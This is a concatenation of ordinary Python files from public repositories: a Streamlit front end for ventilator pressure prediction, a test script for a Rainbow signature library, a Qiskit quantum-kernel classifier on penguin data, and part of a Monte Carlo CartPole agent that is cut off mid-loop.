st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/dilarahaciali/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
with col4:
image = st.image("Ihap.jpg")
github_url = "https://github.com/IhapSubasi"
st.markdown("<h4 style='text-align: center; color: orange;'>Ihap</h4>", unsafe_allow_html=True)
st.markdown(f"[]({github_url})", unsafe_allow_html=True)
linkedin_url = "https://www.linkedin.com/in/mustafaihapsubasi/"
linkedin_logo = "https://content.linkedin.com/content/dam/me/business/en-us/amp/brand-site/v2/bg/LI-Bug.svg.original.svg"
st.markdown(f'<a href="{linkedin_url}" target="_blank"><img src="{linkedin_logo}" alt="LinkedIn" width="50"></a>', unsafe_allow_html=True)
elif page=="Predictor":
#Subtitle
st.subheader('Please provide your features to have access to the prediction')
#------- 2 - Choose kind of features --------
#Title
st.info('1️⃣ Select the type of data')
#List of three choices
#TODO: help with breath ID ?
button_data_provide = st.selectbox('Pick one:', ["","As a BreathID",
"As a CSV file with all features",
"Neither"],
)
#Conditions depending of the choices of kind of features:
if button_data_provide =="Neither":
st.warning("Please collect some features and come back later to have a prediction")
#------- 4- General - Select the way to provide data ---------
#Useful function to have the gif of lungs
def load_lottieurl(url: str):
r = requests.get(url)
if r.status_code != 200:
return None
return r.json()
#-------- 4-A- If the user choose "I have a breath_id", add a text field to fill and do API call --------
if button_data_provide == "As a BreathID":
st.info('2️⃣ Please provide a BreathID') #Title
breath_ids = st.multiselect('Select up to 5 BreathID', list(range(1, 201)), max_selections=5) #Input field
predict_with_breath_id = st.button(":blue[Get prediction]") #Button to get prediction
if predict_with_breath_id:
if breath_ids:
#Waiting animation (lungs + bar)
col1, col2, col3 = st.columns([1,1,1])
lottie_json = load_lottieurl("https://lottie.host/190f6b9e-80da-496f-a5b7-7374254d7634/TF29EiWHw9.json")
with col2:
progress_text = "Operation in progress. Please wait."
my_bar = st.progress(0, text=progress_text)
for percent_complete in range(2):
with col2:
with st_lottie_spinner(lottie_json, height = 200, width = 200, key=percent_complete):
time.sleep(2.5)
my_bar.progress((percent_complete+1)*50, text=progress_text)
my_bar.empty() #Remove waiting bar
st.success('Here are your results 🔽') #Success message
#Start API call
for breath_id in breath_ids:
api_response = make_api_request_with_id(breath_id)
time_step=[ 0.0, 0.0331871509552001, 0.0663647651672363, 0.0997838973999023,
0.1331243515014648, 0.1665058135986328, 0.1999211311340332, 0.233269453048706,
0.2667148113250732, 0.3001444339752197, 0.3334481716156006, 0.3667137622833252,
0.4000871181488037, 0.4334573745727539, 0.4668083190917969, 0.5001921653747559,
0.5335805416107178, 0.5669963359832764, 0.6003098487854004, 0.6336038112640381,
0.667017936706543, 0.7003989219665527, 0.7338323593139648, 0.7672531604766846,
0.8007259368896484, 0.8341472148895264, 0.8675739765167236, 0.9009172916412354,
0.9343087673187256, 0.967742681503296, 1.0011558532714844, 1.0346879959106443,
1.0681016445159912, 1.1015379428863523, 1.1348886489868164, 1.168378829956055,
1.2017686367034912, 1.235328197479248, 1.2686767578125, 1.3019189834594729,
1.335435390472412, 1.3688392639160156, 1.4022314548492432, 1.4356489181518557,
1.4690682888031006, 1.5024497509002686, 1.5358901023864746, 1.5694541931152344,
1.602830410003662, 1.636289119720459, 1.6696226596832275, 1.7029592990875244,
1.7363479137420654, 1.7697343826293943, 1.803203582763672, 1.8365991115570068,
1.869977235794068, 1.903436183929444, 1.9368293285369875, 1.970158576965332,
2.0035817623138428, 2.0370094776153564, 2.0702223777771, 2.1036837100982666,
2.1370668411254883, 2.170450448989868, 2.203945636749268, 2.23746919631958,
2.270882368087769, 2.304311990737915, 2.3376832008361816, 2.371119737625122,
2.4044580459594727, 2.4377858638763428, 2.471191644668579, 2.504603147506714,
2.537960767745972, 2.571407556533813, 2.604744434356689, 2.638017416000366]
df_api = pd.DataFrame(api_response)
df_api["time_step"]=time_step
mae = mean_absolute_error(df_api["actual_pressure"], df_api["predicted_pressure"])
# Create graph using matplotlib
fig, ax = plt.subplots()
ax.plot(df_api["time_step"], df_api["actual_pressure"], label="Actual Pressure", color='#3c7dc2')
#ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
# set y and x label
ax.set_ylabel("Pressure")
ax.set_xlabel("Time step")
# Add legend, other and title
ax.legend(loc='upper left', bbox_to_anchor=(0.0, -0.1))
ax.grid(alpha=0.15) #Improve transparency of grid
ax.spines['top'].set_visible(False) #Remove top bar
ax.spines['right'].set_visible(False) #Remove right bar
fig.set_size_inches(10, 5) #Range 10, 5
plt.title(f"Mechanical Ventilation Prediction - Breath ID={breath_id}")
#Add MAE
ratio_max_min = df_api["actual_pressure"].max()-(df_api["actual_pressure"].min())
same_size_rectangle = ((df_api["actual_pressure"].max())-(df_api["actual_pressure"].min()))/(16.7343242500-4.853261668752088)
rectangle = Rectangle((1.53, df_api["actual_pressure"].min()+ratio_max_min*0.6), 0.5, 0.8*same_size_rectangle, fill=True, color='red', alpha=0.2)
ax.add_patch(rectangle)
plt.annotate(f'MAE* = {mae}', xy=(1.6, df_api["actual_pressure"].min()+ratio_max_min*0.615), fontsize=12, color='black')
# Add in Streamlit
st.pyplot(fig)
st.write(" ")
st.write("\* **MAE= (Mean Absolute Error)** can be used to measure how close something is from being correct. In our case, **MAE** represents the average difference between actual and predicted api_response. The smaller the better!")
st.write(" ")
else:
st.error("Please, don't forget to enter at least one breath_id")
#-------- 4-B- If the user choose "I don't have a breath_id but I have all the features", add some field to fill and do API call --------
if button_data_provide == "As a CSV file with all features":
st.info('2️⃣ Please provide your features as CSV file:') #Title
up_file = st.file_uploader("Please upload a file with at least 4 columns: 'R', 'C', 'u_in' and 'u_out'",
type=["csv"]) #Add an if condition if the file is not a csv
if up_file:
st.success("File uploaded successfully!")
get_prediction_using_csv = st.button(":blue[Get prediction]")
if get_prediction_using_csv:
#waiting animation(lungs and bar)
col1, col2, col3 = st.columns([1,1,1])
lottie_json = load_lottieurl("https://lottie.host/190f6b9e-80da-496f-a5b7-7374254d7634/TF29EiWHw9.json")
with col2:
progress_text = "Operation in progress. Please wait."
my_bar = st.progress(0, text=progress_text)
for percent_complete in range(2):
with col2:
with st_lottie_spinner(lottie_json, height = 200, width = 200, key=percent_complete):
time.sleep(2.5)
my_bar.progress((percent_complete+1)*50, text=progress_text)
my_bar.empty() #Remove waiting bar
st.success('Here are your results 🔽') #Success message
#Read csv
df = pd.read_csv(up_file)
R = df['R'].values.tolist()
C = df['C'].tolist()
u_in = df['u_in'].tolist()
u_out = df['u_out'].tolist()
api_response = make_api_request_with_features(R=R, C=C, u_in=u_in, u_out=u_out)
# will return dict(time_step = time_column, actual_pressure = actual_pressure,predicted_pressure = loaded_model.predict(X).reshape(80))
if api_response is not None:
df_api = pd.DataFrame(api_response)
mae = mean_absolute_error(df_api["actual_pressure"], df_api["predicted_pressure"])
# Create graph using matplotlib
fig, ax = plt.subplots()
ax.plot(df_api["time_step"], df_api["actual_pressure"], label="Actual Pressure", color='#3c7dc2')
ax.plot(df_api["time_step"], df_api["predicted_pressure"], label="Predicted Pressure", color='#eb8634')
# set y and x label
ax.set_ylabel("Pressure")
ax.set_xlabel("Time step")
# Add legend, other and title
ax.legend(loc='upper left', bbox_to_anchor=(0.0, -0.1))
ax.grid(alpha=0.15) #Improve transparency of grid
ax.spines['top'].set_visible(False) #Remove top bar
ax.spines['right'].set_visible(False) #Remove right bar
fig.set_size_inches(10, 5) #Range 10, 5
plt.title(f"Mechanical Ventilation Prediction - Breath ID={breath_id}")
#Add MAE
ratio_max_min = df_api["actual_pressure"].max()-(df_api["actual_pressure"].min())
same_size_rectangle = ((df_api["actual_pressure"].max())-(df_api["actual_pressure"].min()))/(16.7343242500-4.853261668752088)
rectangle = Rectangle((1.53, df_api["actual_pressure"].min()+ratio_max_min*0.6), 0.5, 0.8*same_size_rectangle, fill=True, color='red', alpha=0.2)
ax.add_patch(rectangle)
plt.annotate(f'MAE* = {mae}', xy=(1.6, df_api["actual_pressure"].min()+ratio_max_min*0.615), fontsize=12, color='black')
# Add in Streamlit
st.pyplot(fig)
st.write(" ")
st.write("\* **MAE= (Mean Absolute Error)** can be used to measure how close something is from being correct. In our case, **MAE** represents the average difference between actual and predicted api_response. The smaller the better!")
st.write(" ")
else:
st.error("Problem with the API. Please provide data (R, C, u_in and u_out) with the correct format (80 rows are necessary)")
| Guillaume2126/Mechanical-Ventilation-Prediction-Front-end | Streamilit.py | Streamilit.py | py | 16,553 | python | en | code | 0 | github-code | 90 |
# from Generators import *
from context import cryptovinaigrette
from cryptovinaigrette import cryptovinaigrette
from datetime import datetime as dt
# ANSI escape sequences for terminal colouring.
__RED = "\033[0;31m"
__GREEN = "\033[0;32m"
__NOCOLOR = "\033[0m"


def colored_binary(b):
    """Render a truthy value in green and a falsy one in red."""
    color = __GREEN if b else __RED
    return "{}{}{}".format(color, b, __NOCOLOR)
class args: pass
args = args()
args.v = True
myKeyObject = cryptovinaigrette.rainbowKeygen(save='./')
start = dt.now()
signature = cryptovinaigrette.rainbowKeygen.sign('cvPriv.pem', 'testFile.txt')
end = dt.now()
if args.v:
print()
print("Signed (from file) in", end - start, "seconds")
start = dt.now()
signature = cryptovinaigrette.rainbowKeygen.sign(myKeyObject.private_key, 'testFile.txt')
end = dt.now()
if args.v:
print()
print("Signed (from key object) in", end - start, "seconds")
print()
print("Checking testFile.txt")
start = dt.now()
print("Signature verification with file:", colored_binary(cryptovinaigrette.rainbowKeygen.verify('cvPub.pub', signature, 'testFile.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
print()
print("Checking testFile.txt")
start = dt.now()
print("Signature verification with object :", colored_binary(cryptovinaigrette.rainbowKeygen.verify(myKeyObject.public_key, signature, 'testFile.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
if args.v >= 2:
print("Signature :", signature)
print()
print("Checking testFile2.txt")
start = dt.now()
print("Signature verification with tampered file :", colored_binary(cryptovinaigrette.rainbowKeygen.verify('rPub.rkey', signature, 'testFile2.txt')))
end = dt.now()
if args.v:
print("Verified signature in", end - start, "seconds")
if args.v >= 2:
print("Signature :", signature)
| aditisrinivas97/Crypto-Vinaigrette | test/test.py | test.py | py | 1,830 | python | en | code | 17 | github-code | 90 |
import matplotlib.pyplot as plt
from qiskit.primitives import Sampler
from qiskit.algorithms.optimizers import SPSA, QNSPSA, GradientDescent, ADAM, COBYLA
from qiskit.circuit.library import ZZFeatureMap, TwoLocal, PauliFeatureMap, NLocal, RealAmplitudes, EfficientSU2
from qiskit.visualization import plot_histogram
from qiskit import Aer, transpile, QuantumCircuit
from sklearn.model_selection import train_test_split
from qiskit_machine_learning.algorithms.classifiers import VQC, QSVC, PegasosQSVC, NeuralNetworkClassifier
from qiskit_machine_learning.neural_networks import SamplerQNN, EstimatorQNN
from qiskit_machine_learning.kernels import FidelityQuantumKernel, TrainableFidelityQuantumKernel
from qiskit import QuantumCircuit
from qiskit.algorithms.state_fidelities import ComputeUncompute
from qiskit.circuit import ParameterVector, Parameter
from qiskit_machine_learning.utils.loss_functions import SVCLoss
from qiskit_machine_learning.kernels.algorithms import QuantumKernelTrainer
from VQCClassifier import VQCClassifier
from OptimizerLog import OptimizerLog
from ClassifierLog import ClassifierLog
from OptimizerLog import OptimizerLog
from QuantumEncoder import QuantumEncoder
import numpy as np
import pandas as pd
import seaborn as sns
# feature_names = ['SepalLengthCm', 'SepalWidthCm', 'PetalLengthCm', 'PetalWidthCm']
# label_name = 'Species'
# n_features = len(feature_names) # number of features
# n_train = 10 # number of samples in the training set
# n_test = 0.2 # number of samples in the test set
#
# data = pd.read_csv('data/Iris.csv')
# # subset of the data representing the three classes
# # data = pd.concat([data[0:10], data[50:60], data[100:110]])
# features = data[feature_names]
# # mapping of string to number
# mapping_dict = {class_name: id for id, class_name in enumerate(data[label_name].unique())}
# inverse_dict = {id: class_name for id, class_name in enumerate(data[label_name].unique())}
# labels = data[label_name].map(mapping_dict)
#
# n_classes = len(labels.unique()) # number of classes (clusters)
feature_names = ['island', 'bill_length_mm', 'bill_depth_mm', 'flipper_length_mm', 'body_mass_g', 'sex']
label_name = 'species'
n_features = len(feature_names) # number of features
n_train = 0.8 # number of samples in the training set
n_test = 0.2 # number of samples in the test set
data = sns.load_dataset('penguins')
data = data.dropna()
print(data.isnull().sum().sum())
features = data[['island', 'bill_length_mm', 'bill_depth_mm', 'flipper_length_mm', 'body_mass_g', 'sex']]
features['island'] = features['island'].copy().map({'Torgersen': 0, 'Biscoe': 1, 'Dream': 2})
features['sex'] = features['sex'].copy().map({'Male': 0, 'Female': 1})
labels = data['species'].map({'Adelie': 0, 'Chinstrap': 1, 'Gentoo': 2})
n_classes = len(labels.unique()) # number of classes (clusters)
# numpy array conversion
features = features.to_numpy()
labels = labels.to_numpy()
X_train, X_test, y_train, y_test = train_test_split(features,
labels,
train_size=n_train,
test_size=n_test,
stratify=labels)
# dimensionality reduction
# a random point to be represented as classical and quantum data
random_point = np.random.randint(len(data))
# make a feature map
feature_map = ZZFeatureMap(n_features, reps=1)
# add trainable gate at the beginning of the circuit
# training_params = [ParameterVector('θ', 1)]
training_params = [Parameter('θ')] # shared parameter
circ = QuantumCircuit(n_features)
circ.ry(training_params[0], 0)
circ.ry(training_params[0], 1)
circ.ry(training_params[0], 2)
circ.ry(training_params[0], 3)
# make trainable feature map
feature_map = circ.compose(feature_map)
feature_map.decompose().draw(output='mpl')
plt.savefig('img/qsvm/trainable_feature_map')
# instantiate a trainable kernel
fidelity = ComputeUncompute(sampler=Sampler())
# kernel = FidelityQuantumKernel(feature_map=feature_map, fidelity=fidelity)
kernel = TrainableFidelityQuantumKernel(feature_map=feature_map,
fidelity=fidelity,
training_parameters=training_params)
opt_log = OptimizerLog()
optimizer = SPSA(maxiter=50, callback=opt_log.update)
loss = SVCLoss(C=1.0)
trainer = QuantumKernelTrainer(quantum_kernel=kernel, loss=loss, optimizer=optimizer)
# optimize the kernel
print('optimizing quantum kernel...')
results = trainer.fit(X_train, y_train)
kernel = results.quantum_kernel
# plot the optimized kernel
# ...
# save kernel matrices
kernel_matrix_train = kernel.evaluate(x_vec=X_train)
plt.clf()
plt.imshow(np.asmatrix(kernel_matrix_train), interpolation='nearest', origin='upper', cmap='Blues')
plt.title('Training kernel matrix')
plt.savefig('img/qsvm/kernel_matrix_train')
kernel_matrix_test = kernel.evaluate(x_vec=X_test, y_vec=X_train)
plt.clf()
plt.imshow(np.asmatrix(kernel_matrix_test), interpolation='nearest', origin='upper', cmap='Reds')
plt.title('Testing kernel matrix')
plt.savefig('img/qsvm/kernel_matrix_test')
qsvc = QSVC(quantum_kernel=kernel)
print('training QSVC...')
qsvc.fit(X_train, y_train)
score = qsvc.score(X_test, y_test)
print('testing score: {}'.format(score))
print('end')
| PietroSpalluto/quantum-machine-learning | qsvc.py | qsvc.py | py | 5,357 | python | en | code | 0 | github-code | 90 |
26156715164 | # -*- coding: utf-8 -*-
# 링크 : https://arisel.notion.site/1260-DFS-BFS-cd6efe20107744c8810298405555523e
from collections import deque
import sys
class DFSAndBFS(object):
    """BOJ 1260: traverse an undirected graph from a start node with DFS and
    BFS, visiting lower-numbered neighbours first, and print each visit order
    on its own line (DFS first)."""
    def __init__(self, n, m, v, map_links):
        # n: node count (nodes are 1-based), m: edge count, v: start node,
        # map_links: list of [u, w] edge pairs.
        self.n_node = n
        self.n_link = m
        self.start_node = v
        self.map_links = map_links
        # Adjacency list; index 0 is unused so node ids index directly.
        self.graph = [[] for _ in range(n+1)]
        self.dfs_linked = []
        self.bfs_linked = []
    def _make_map(self):
        # Undirected graph: record every edge in both directions, then sort
        # each adjacency list so the smallest neighbour is explored first.
        for i,j in self.map_links:
            self.graph[i].append(j)
            self.graph[j].append(i)
        for i,v in enumerate(self.graph):
            v.sort()
    def _dfs(self):
        # Iterative DFS with an explicit stack. Neighbours are pushed in
        # reversed sorted order so the smallest is on top and popped first.
        # A node may be pushed more than once; the visited check on pop
        # keeps the output correct.
        dfs_check_list = [False]*(self.n_node + 1)
        dfs_stack = [self.start_node]
        while dfs_stack:
            i = dfs_stack.pop()
            if not dfs_check_list[i]:
                dfs_check_list[i] = True
                self.dfs_linked.append(i)
                dfs_stack += list(reversed(self.graph[i]))
    def _bfs(self):
        # Standard queue-based BFS; nodes are marked visited on enqueue so
        # each enters the queue at most once.
        bfs_check_list = [False]*(self.n_node + 1)
        bfs_queue = deque([self.start_node])
        bfs_check_list[self.start_node] = True
        while bfs_queue:
            i = bfs_queue.popleft()
            self.bfs_linked.append(i)
            for j in self.graph[i]:
                if not bfs_check_list[j]:
                    bfs_queue.append(j)
                    bfs_check_list[j] = True
    def _return(self):
        # Emit the two traversal orders, space-separated.
        print(*self.dfs_linked)
        print(*self.bfs_linked)
    def solve(self):
        # Build the graph, run both traversals, then print the results.
        self._make_map()
        self._dfs()
        self._bfs()
        self._return()
if __name__ == "__main__":
n, m, v = list(map(int, sys.stdin.readline().split()))
map_links = []
for _ in range(m):
map_links.append(list(map(int, sys.stdin.readline().split())))
DFSAndBFS_problem = DFSAndBFS(n, m, v, map_links)
DFSAndBFS_problem.solve()
| arisel117/BOJ | code/BOJ 1260.py | BOJ 1260.py | py | 1,675 | python | en | code | 0 | github-code | 90 |
17987109849 | #!/usr/bin/env python3
n = int(input())
a = list(map(int, input().split()))
def rank(n):
    """Map an AtCoder rating to its color band; anything outside the
    defined 1-3199 bands is 'others'."""
    bands = (
        (1, 399, 'gray'), (400, 799, 'brown'), (800, 1199, 'green'),
        (1200, 1599, 'skyblue'), (1600, 1999, 'blue'), (2000, 2399, 'yellow'),
        (2400, 2799, 'orange'), (2800, 3199, 'red'),
    )
    for low, high, color in bands:
        if low <= n <= high:
            return color
    return 'others'
colors = [rank(a[i]) for i in range(n)]
numother = colors.count('others')
colors = set(colors)
if 'others' in colors:
colors.remove('others')
minimum = len(colors)
tmp = minimum
if minimum == 0:
minimum = 1
maximum = tmp + numother
else:
minimum = len(colors)
maximum = minimum
print(minimum, maximum)
| Aasthaengg/IBMdataset | Python_codes/p03695/s615455860.py | s615455860.py | py | 866 | python | en | code | 0 | github-code | 90 |
20878733420 | from simple_launch import SimpleLauncher
import yaml
import os
sl = SimpleLauncher()
sl.declare_arg('field', 'uwFog')
sl.declare_arg('base', 'night')
def launch_setup():
    """Patch the coral rgb.yaml config with the 'field'/'base' launch
    arguments, then start a slider_publisher node driving that file."""
    rgb = sl.find('coral','rgb.yaml')
    # Rewrite the YAML in place so the sliders start from the launch args.
    with open(rgb) as f:
        config = yaml.safe_load(f)
    config['color']['field'] = sl.arg('field')
    config['color']['base'] = sl.arg('base')
    with open(rgb,'w') as f:
        yaml.safe_dump(config, f)
    sl.node('slider_publisher',arguments=[rgb])
    return sl.launch_description()
generate_launch_description = sl.launch_description(launch_setup)
| oKermorgant/coral | custom_scene/rgb_launch.py | rgb_launch.py | py | 582 | python | en | code | 3 | github-code | 90 |
33693032619 | import cv2
import numpy as np
class HolesFinder:
    """Locates circular holes in the image of a single detected object."""

    def find_holes(self, found_object):
        """Return (circles, count): the HoughCircles detections (rounded to
        uint16, or None when nothing is found) and how many were detected."""
        grayscale = cv2.cvtColor(found_object, cv2.COLOR_BGR2GRAY)
        circles = cv2.HoughCircles(grayscale, cv2.HOUGH_GRADIENT, 1, 35,
                                   param1=43, param2=18, minRadius=4, maxRadius=16)
        hole_count = 0
        if circles is not None:
            circles = np.uint16(np.around(circles))
            hole_count = len(circles[0])
        return circles, hole_count
| JacobMod/Lego_holes_finder | src/holes_finder.py | holes_finder.py | py | 599 | python | en | code | 1 | github-code | 90 |
44259659122 | import re
import asyncio
from concurrent.futures import ThreadPoolExecutor
def asyncrun(ls, func):
    """Run ``func`` once per item of ``ls`` concurrently and block until done.

    ls: iterable of items to process
    func: callable invoked as func(item)

    Uses a thread pool of up to 25 workers. Exceptions raised by ``func`` are
    stored in the discarded futures (fire-and-forget), matching the original
    behaviour. Unlike the previous asyncio version this does not raise on an
    empty ``ls`` (asyncio.wait([]) raises ValueError), does not leak the
    executor, and does not close the process-global event loop.
    """
    # ThreadPoolExecutor.__exit__ calls shutdown(wait=True), which blocks
    # until every submitted task has completed.
    with ThreadPoolExecutor(25) as executor:
        for item in ls:
            executor.submit(func, item)
def get_m3u8_ls(m3u8file):
    r"""Return every segment line (ending in 'ts') from an m3u8 playlist.

    m3u8file: path to the .m3u8 playlist file

    The previous regex, "\n([^\n]+ts)\n", consumed the trailing newline of
    each match, so two consecutive segment lines were only matched
    alternately; it also missed a segment on the very first line and on a
    final line lacking a newline. Iterating line by line fixes all three.
    """
    with open(m3u8file, 'r') as fp:
        return [line.strip() for line in fp if line.strip().endswith('ts')]
| apammaaaa/jhcrawler | jcrawler/mdownload.py | mdownload.py | py | 606 | python | en | code | 0 | github-code | 90 |
23046529021 | '''
354. Russian Doll Envelopes
Hard
You are given a 2D array of integers envelopes where envelopes[i] = [wi, hi] represents the width and the height of an envelope.
One envelope can fit into another if and only if both the width and height of one envelope are greater than the other envelope's width and height.
Return the maximum number of envelopes you can Russian doll (i.e., put one inside the other).
Note: You cannot rotate an envelope.
Example 1:
Input: envelopes = [[5,4],[6,4],[6,7],[2,3]]
Output: 3
Explanation: The maximum number of envelopes you can Russian doll is 3 ([2,3] => [5,4] => [6,7]).
https://leetcode.com/problems/russian-doll-envelopes
'''
class Solution:
    def maxEnvelopes(self, A):
        """Return the maximum number of nested envelopes (LeetCode 354).

        Sort by width ascending and, for equal widths, by height descending
        so two same-width envelopes can never chain; the answer is then the
        length of the longest strictly increasing subsequence of the heights,
        found via patience sorting in O(n log n).
        """
        # Local import: the original referenced ``bisect`` without importing
        # it anywhere in the file, raising NameError at runtime.
        from bisect import bisect_left

        A.sort(key=lambda e: (e[0], -e[1]))
        # tails[k] = smallest tail height of any increasing run of length k+1
        tails = []
        for _, height in A:
            pos = bisect_left(tails, height)
            if pos == len(tails):
                tails.append(height)
            else:
                tails[pos] = height
        return len(tails)
| aditya-doshatti/Leetcode | russian_doll_envelopes_354.py | russian_doll_envelopes_354.py | py | 1,082 | python | en | code | 0 | github-code | 90 |
15009260868 | import re
import datetime
from enum import Enum
class OneNight:
def __init__(self, guardID=None):
self.guardID = guardID or None
self.minutes = [0] * 60
class State(Enum):
asleep = "asleep"
awake = "awake"
def extractDate(line):
    # Parse the "[YYYY-MM-DD hh:mm]" prefix of a log line into a datetime.
    fields = re.match('\[([0-9]*)-([0-9]*)-([0-9]*) ([0-9]*):([0-9]*)\]', line).groups()
    year, month, day, hour, minute = map(int, fields)
    return datetime.datetime(year, month, day, hour, minute)
def extractGuard(line):
    # Pull the guard ID out of a "[...] Guard #N begins shift" line.
    found = re.match('\[.*\] Guard #([0-9]*) begins shift', line)
    return int(found.group(1))
def readFile():
    """Parse input.txt into {datetime: event}, where the event is a guard ID
    (int) for shift starts or a State member for sleep/wake transitions.

    Uses ``with`` for the file: the old try/finally called ``fp.close()``
    even when ``open()`` itself failed, raising a NameError that masked the
    real error. Blank lines are now skipped instead of silently terminating
    the read (the old ``while line:`` loop stopped at the first empty line).
    """
    operationHash = {}
    with open('input.txt', 'r') as fp:
        for line in fp:
            line = line.strip()
            if not line:
                continue
            print(line)
            date = extractDate(line)
            if "Guard" in line:
                operationHash[date] = extractGuard(line)
            elif "wakes up" in line:
                operationHash[date] = State.awake
            elif "falls asleep" in line:
                operationHash[date] = State.asleep
    return operationHash
def guardSleeping(guardID, startTime, endTime, newHash):
newDate = startTime.replace(minute=0);
if not newDate in newHash:
newHash[newDate] = OneNight(guardID = guardID)
for x in range(startTime.minute, endTime.minute):
newHash[newDate].minutes[x] = 1
print ("{}: {} - {} {}".format(guardID, startTime, endTime, newDate))
def rotateData(operationData):
guardID = ''
lastSleepTime = 0
newHash = {}
for key in sorted(operationData.keys()):
time = key
value = operationData[key]
if value == State.awake:
guardSleeping(guardID, lastSleepTime, key, newHash)
elif value == State.asleep:
lastSleepTime = key
else:
guardID = value
return newHash
def prettyPrintHash(newHash):
for x in sorted(newHash.keys()):
thisLine = str(x) + ": " + str(newHash[x].guardID) + "\t"
for y in range(60):
if (newHash[x].minutes[y] == 0):
thisLine += "."
else:
thisLine += "*"
thisLine += "({})".format(countMinutesAsleep(newHash[x].minutes))
print(thisLine)
def countMinutesAsleep(minuteList):
    # A minute counts as asleep whenever its entry is non-zero.
    return sum(1 for flag in minuteList if flag != 0)
def sumMinutesPerGuard(newHash):
    """Total the minutes asleep per guard, print the tally, and return the
    guard ID with the most minutes asleep (earliest-seen guard wins ties)."""
    totals = {}
    for date in sorted(newHash):
        night = newHash[date]
        totals[night.guardID] = totals.get(night.guardID, 0) + countMinutesAsleep(night.minutes)
    print(totals)
    # Strict-greater scan keeps the earliest-inserted guard on ties,
    # exactly like the original implementation.
    sleepiest = list(totals)[0]
    for guard, minutes in totals.items():
        if minutes > totals[sleepiest]:
            sleepiest = guard
    print(sleepiest)
    return sleepiest
def findSleepiestMinute(newHash, guardID):
    """Return the minute (0-59) during which the given guard was asleep on
    the most nights, printing a summary line along the way."""
    perMinute = [0] * 60
    for night in newHash.values():
        if night.guardID == guardID:
            for minute in range(60):
                perMinute[minute] += night.minutes[minute]
    # max() returns the first index attaining the maximum, matching the old
    # strict-greater scan (earliest minute wins ties).
    sleepiestMinute = max(range(60), key=perMinute.__getitem__)
    print("Guard {}:\t{} {} ({})".format(guardID, sleepiestMinute, perMinute[sleepiestMinute], guardID * sleepiestMinute))
    return sleepiestMinute
def findSleepiestMinuteForAllGuards(newHash):
guardList = []
for x in newHash.keys():
if not newHash[x].guardID in guardList:
guardList.append(newHash[x].guardID)
for y in guardList:
findSleepiestMinute(newHash, y)
operationData = readFile()
newHash = rotateData(operationData)
prettyPrintHash(newHash)
sleepiestGuard = sumMinutesPerGuard(newHash)
sleepiestMinute = findSleepiestMinute(newHash, sleepiestGuard)
print(sleepiestGuard * sleepiestMinute)
findSleepiestMinuteForAllGuards(newHash) | TinaFemea/AOC2018 | Day4/D4P1.py | D4P1.py | py | 3,615 | python | en | code | 0 | github-code | 90 |
8447073187 | '''
wapp to read tuple of integers from the user & print in descending
'''
# Read integers from the user until they decline, then print the collected
# tuple both as entered and in descending numeric order.
list_data = []
tuple_data = ()
reply = input("do u wish to add integers y/n ")
while reply == 'y':
    # int() conversion is the fix: the original appended raw strings, so the
    # final sort was lexicographic ("9" sorted above "10"), not numeric.
    ele = int(input("enter no to add "))
    list_data.append(ele)
    reply = input("do u wish to more np y/ n ")
tuple_data = tuple(list_data)
print("Original data", tuple_data)
list_data.sort(reverse=True)
tuple_data = tuple(list_data)
print("Sorted data", tuple_data)
| dravya08/workshop-python | L7/P2.py | P2.py | py | 443 | python | en | code | 0 | github-code | 90 |
41705560618 | import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
import pymongo
from utility.photo_interface import PhotoInterface
import logging
logging.basicConfig(filename = "/.freespace/instagram_storage.log", level=logging.DEBUG,
format=' [%(asctime)s] [%(levelname)s] (%(threadName)-10s) %(message)s '
)
def save_mogo(res, mid_lat, mid_lng):
    """Persist a batch of Instagram photo records to MongoDB.

    res: iterable of dict-like photo records; each must carry an 'id' key
         (presumably Instagram's own media id -- TODO confirm upstream schema).
    mid_lat, mid_lng: latitude/longitude of the crawled region's midpoint,
         stamped onto every record before insertion.
    """
    photo_interface = PhotoInterface()
    for r in res:
        logging.warning("type = "+str(type(r)))
        # Tag each record with the region midpoint it was crawled from.
        r['mid_lat'] = mid_lat
        r['mid_lng'] = mid_lng
        # Reusing Instagram's id as Mongo's _id makes repeat inserts collide,
        # deduplicating photos at the database level.
        r['_id'] = r['id'] #filter dup using instagram internal id
        logging.warning('inserting photo to mongodb')
        photo_interface.saveDocument(r)
        logging.warning("r = "+str(r))
    #mongo.close()
| juicyJ/citybeat_online | crawlers/instagram_crawler/mongo_storage.py | mongo_storage.py | py | 789 | python | en | code | 0 | github-code | 90 |
14351058211 | import gym
from rlsuite.examples.cartpole import cartpole_constants
from rlsuite.examples.cartpole.cartpole_constants import check_termination, LOGGER_PATH
from rlsuite.agents.classic_agents.mc_agent import MCAgent
import logging.config
from rlsuite.utils.quantization import Quantization
from rlsuite.utils.functions import plot_rewards, plot_rewards_completed
import matplotlib.pyplot as plt
from rlsuite.utils.constants import LOGGER
# COMMENT it seems that monte carlo has high variance maybe we should reduce exploration
logging.config.fileConfig(LOGGER_PATH)
logger = logging.getLogger(LOGGER)
if __name__ == "__main__":
env = gym.make(cartpole_constants.environment)
train_durations = {}
eval_durations = {}
num_of_actions = env.action_space.n
dimensions_high_barriers = env.observation_space.high
dimensions_low_barriers = env.observation_space.low
# if we want to exclude one dimension we can set freq=1
dimensions_description = list(zip(dimensions_low_barriers, dimensions_high_barriers, cartpole_constants.var_freq))
quantizator = Quantization(dimensions_description)
agent = MCAgent(num_of_actions, quantizator.dimensions)
for i_episode in range(cartpole_constants.max_episodes):
# Initialize the environment and state
done = False
train = True
if (i_episode + 1) % cartpole_constants.EVAL_INTERVAL == 0:
train = False
next_observation = env.reset()
agent.adjust_exploration(i_episode)
state_action_ls = []
reward_ls = []
t = 0
while not done:
t += 1
# env.render()
state = quantizator.digitize(next_observation)
action = agent.choose_action(state, train=train) # Select and perform an action
next_observation, reward, done, _ = env.step(action)
state_action_ls.append((state, action))
reward_ls.append(reward)
if train:
